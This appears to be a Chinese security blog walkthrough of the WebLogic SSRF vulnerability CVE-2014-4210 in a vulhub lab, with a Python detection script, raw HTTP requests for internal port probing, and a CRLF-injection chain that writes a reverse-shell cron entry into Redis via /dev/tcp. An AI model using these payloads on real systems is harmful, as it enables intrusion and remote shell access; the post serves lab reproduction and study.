weblogic SSRF漏洞(CVE-2014-4210)检测利用

news/2024/11/30 2:32:47/

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

SSRF漏洞检测利用

脚本检测

def run(self):headers = {"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"vulnurl = self.url + payloadtry:req = requests.get(vulnurl, headers=headers, timeout=10)if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:print("[+]存在weblogic SSRF漏洞...(中危)\tpayload: "+vulnurl)except:print("[-] "+__file__+"====>连接超时")

检测结果:
在这里插入图片描述

手动检测及利用
SSRF漏洞存在于http://192.168.1.15:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.1.15:7000 HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=g1XccNKfk62M7NgynFpdrKjLkDP1Vmn1qJZ922G0dMfB2ZwWJvwD!1652044680
Upgrade-Insecure-Requests: 1

可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type。修改为一个不存在的端口,将会返回could not connect over HTTP to server。如下如回包对比:
在这里插入图片描述
通过错误的不同,即可探测内网状态。

注入HTTP头,利用Redis反弹shell

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网,发现http://172.21.0.2:6379 可以连通:
在这里插入图片描述
发送三条redis命令,将弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.21.0.2/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.21.0.2%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.21.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.31%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=g1XccNKfk62M7NgynFpdrKjLkDP1Vmn1qJZ922G0dMfB2ZwWJvwD!1652044680
Upgrade-Insecure-Requests: 1

在这里插入图片描述
getshell
在这里插入图片描述
参考链接:https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf
在这里插入图片描述


http://www.ppmy.cn/news/194764.html

相关文章

关于ABAQUS使用子程序出现“libirc.lib(fast_mem_ops.obj) : warning LNK4210”错误

** (关于ABAQUS使用子程序出现“libirc.lib(fast_mem_ops.obj) : warning LNK4210”错误) ** 真的是一个疑难杂症 本人在进行有限元仿真时,前期工作都已经搞定了,什么子程序关联啊,其实子程序关联什么的都是最简单的。但是到了后期在使用…

linux uddi服务器,Weblogic SSRF漏洞复现(CVE-2014-4210)

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 测试环境搭建 编译及启动测试环境 docker-compose up -d 访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。…

[Vulhub] Weblogic SSRF 漏洞(CVE-2014-4210)

0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。…

weblogic ssrf漏洞[CVE-2014-4210]

文章目录 漏洞概述vulhub复现环境搭建源码调试 漏洞概述 weblogic的这个uddiexplorer组件的SearchPublicRegistries.jsp页面存在一个SSRF漏洞 分类详情漏洞编号CVE-2014-4210漏洞种类SSRF影响版本weblogic 10.0.2 – 10.3.6 vulhub复现 vulhub环境搭建 # 启动 cd vulhub/w…

漏洞复现CVE-2014-4210(Weblogic ssrf)

最近在打vulhub的靶场记录一下,我是小菜鸡一个,不对的地方还请指教。废话不多说开始。 原因: ip:7001/uddiexplorer/SearchPublicRegistries.jsp传参时未做过滤导致ssrf漏洞产生,导致可以对内网的服务进行扫描&攻击。 影响版本&#xff…

Weblogic SSRF漏洞(CVE-2014-4210)

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——> SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于&#xf…

Weblogic SSRF 漏洞(CVE-2014-4210)分析

Weblogic SSRF 漏洞是一个比较经典的 SSRF 漏洞案例,该漏洞存在于 http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries. jsp 页面中,如图 1 -1 所示 图 1-1 Weblogic SSRF 漏洞 Weblogic SSRF 漏洞可以通过向服务端发送以下请求参数进行触发…

Weblogic SSRF(CVE-2014-4210)漏洞复现

1.漏洞描述 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.漏洞等级 高危 3.影响版本 weblogic 10.0.2 – 10.3.6版本 4.准备工具 VMware环境 vulhub 的weblogic漏洞环境 kali:192.168.…